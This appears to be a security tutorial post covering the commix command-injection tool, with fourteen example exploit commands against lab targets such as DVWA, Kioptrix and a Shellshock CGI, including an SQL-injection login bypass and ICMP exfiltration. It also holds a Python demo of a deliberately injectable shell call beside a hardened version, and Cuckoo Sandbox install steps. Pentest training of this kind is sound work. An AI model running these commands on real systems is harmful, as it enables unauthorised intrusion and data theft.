🦑 SUPPORTED OS :

ArchStrike
BlackArch Linux
BackBox
Kali Linux
Parrot Security OS
Pentoo Linux
Weakerthan Linux
Mac OS X
Windows (experimental)

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) git clone https://github.com/commixproject/commix.git

2) cd commix

3) python commix.py -h

🦑 COMMANDS (the hosts below are lab targets; only test systems you are authorised to attack) :

1. Exploiting Damn Vulnerable Web App:
root@kali:~/commix# python commix.py --url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" --data="ip=127.0.0.1&Submit=submit" --cookie="security=medium; PHPSESSID=nq30op434117mo7o2oe5bl7is4"

2. Exploiting php-Charts 1.0 using injection payload suffix & prefix string:
root@kali:~/commix# python commix.py --url="http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=test" --prefix="'" --suffix="//"

3. Exploiting OWASP Mutillidae using extra headers and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.178.46/mutillidae/index.php?popUpNotificationCode=SL5&page=dns-lookup.php" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETag:123\n" --proxy="127.0.0.1:8081"

4. Exploiting Persistence using ICMP exfiltration technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --icmp-exfil="ip_src=192.168.178.5,ip_dst=192.168.178.8"

5. Exploiting Persistence using an alternative (python) shell:
root@kali:~/commix# python commix.py --url="http://192.168.178.8/debug.php" --data="addr=127.0.0.1" --alter-shell="Python"

6. Exploiting Kioptrix: Level 1.1 (#2):
root@kali:~/commix# python commix.py --url="http://192.168.178.2/pingit.php" --data="ip=127.0.0.1E&submit=submit" --auth-url="http://192.168.178.2/index.php" --auth-data="uname=admin&psw=%27+OR+1%3D1--+-&btnLogin=Login"

7. Exploiting Kioptrix: 2014 (#5) using custom user-agent and specified injection technique:
root@kali:~/commix# python commix.py --url="http://192.168.178.6:8080/phptax/drawimage.php?pfilez=127.0.0.1&pdf=make" --user-agent="Mozilla/4.0 Mozilla4_browser" --technique="f" --root-dir="/"

8. Exploiting CVE-2014-6271/Shellshock:
root@kali:~/commix# python commix.py --url="http://192.168.178.4/cgi-bin/status/" --shellshock

9. Exploiting commix-testbed (cookie) using cookie-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/commix-testbed/scenarios/cookie/cookie(blind).php" --cookie="addr=127.0.0.1"

10. Exploiting commix-testbed (user-agent) using ua-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/user-agent/ua(blind).php" --level=3

11. Exploiting commix-testbed (referer) using referer-based injection:
root@kali:~/commix# python commix.py --url="http://192.168.2.4/commix-testbed/scenarios/referer/referer(classic).php" --level=3

12. Exploiting Flick 2 using custom headers and base64 encoding option:
root@kali:~/commix# python commix.py --url="https://192.168.2.12/do/cmd/*" --headers="X-UUID:commix\nX-Token:dTGzPdMJlOoR3CqZJy7oX9JU72pvwNEF" --base64

13. Exploiting commix-testbed (JSON-based) using JSON POST data:
root@kali:~/commix# python commix.py --url="http://192.168.2.11/commix-testbed/scenarios/regular/POST/classic_json.php" --data='{"addr":"127.0.0.1","name":"ancst"}'

14. Exploiting SickOs 1.1 using shellshock module and HTTP proxy:
root@kali:~/commix# python commix.py --url="http://192.168.2.8/cgi-bin/status" --shellshock --proxy="192.168.2.8:3128"
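The bug class commix exploits, as an added example (my code, not commix's, and not from the original post): a DVWA-style lookup that concatenates user input into a shell command string, next to a hardened version that allow-lists the host and passes an argv list with shell=False. `echo` stands in for `ping` so it runs anywhere; the payloads are constructed separator and command-substitution injections of the kind commix tries against the exec page in example 1.

```python
import re
import subprocess
from typing import Dict, List, Tuple

# Allow-list: an IPv4 literal or a DNS hostname; separators, quotes, $ and spaces never match.
HOST_RE = re.compile(
    r"^(?:\d{1,3}(?:\.\d{1,3}){3}"
    r"|[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*)$")


def lookup_vulnerable(host: str) -> str:
    """DVWA-style: the parameter is concatenated into a string the shell parses.
    `echo` stands in for `ping -c 1`; the flaw is identical."""
    return subprocess.run("echo pinging " + host, shell=True,
                          capture_output=True, text=True).stdout


def lookup_hardened(host: str) -> str:
    """Validate against the allow-list, then run an argv list with shell=False so no
    shell ever parses the value, even if the regex is later relaxed."""
    if not HOST_RE.match(host):
        raise ValueError("invalid host")
    return subprocess.run(["echo", "pinging", host], shell=False,
                          capture_output=True, text=True).stdout


def payloads() -> List[str]:
    """Constructed injection strings: separators and command substitution."""
    return ["127.0.0.1; echo INJECTED", "127.0.0.1 && echo INJECTED",
            "127.0.0.1 | echo INJECTED", "$(echo INJECTED)", "`echo INJECTED`"]


def demo() -> Dict[str, Tuple[bool, bool]]:
    """For each payload: (vulnerable version ran the injected command,
    hardened version accepted the input)."""
    results = {}
    for p in payloads():
        injected = "INJECTED" in lookup_vulnerable(p)
        try:
            lookup_hardened(p)
            accepted = True
        except ValueError:
            accepted = False
        results[p] = (injected, accepted)
    return results


if __name__ == "__main__":
    for p, (injected, accepted) in demo().items():
        print(f"{p!r:32} vulnerable={injected} hardened_accepts={accepted}")
```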

🦑 Tested by undercode on ubuntu

@UndercodeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 2020 updated - Cuckoo Sandbox, an automated dynamic malware analysis system
pinterest.com/undercode_Testing

🦑 𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ :

1) $ sudo pip install -U pip setuptools

2) $ sudo pip install -U cuckoo
Although a global installation of Cuckoo in your OS works mostly fine, we highly recommend installing Cuckoo in a virtualenv, which looks roughly as follows:

3) $ virtualenv venv

4) $ . venv/bin/activate

> (venv)$ pip install -U pip setuptools

> (venv)$ pip install -U cuckoo

5) To work from source instead: git clone https://github.com/cuckoosandbox/cuckoo.git

> Cuckoo 2.x is a Python 2.7 project, so pip and virtualenv above must be the Python 2 ones.

Enjoy free malware analysis.

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁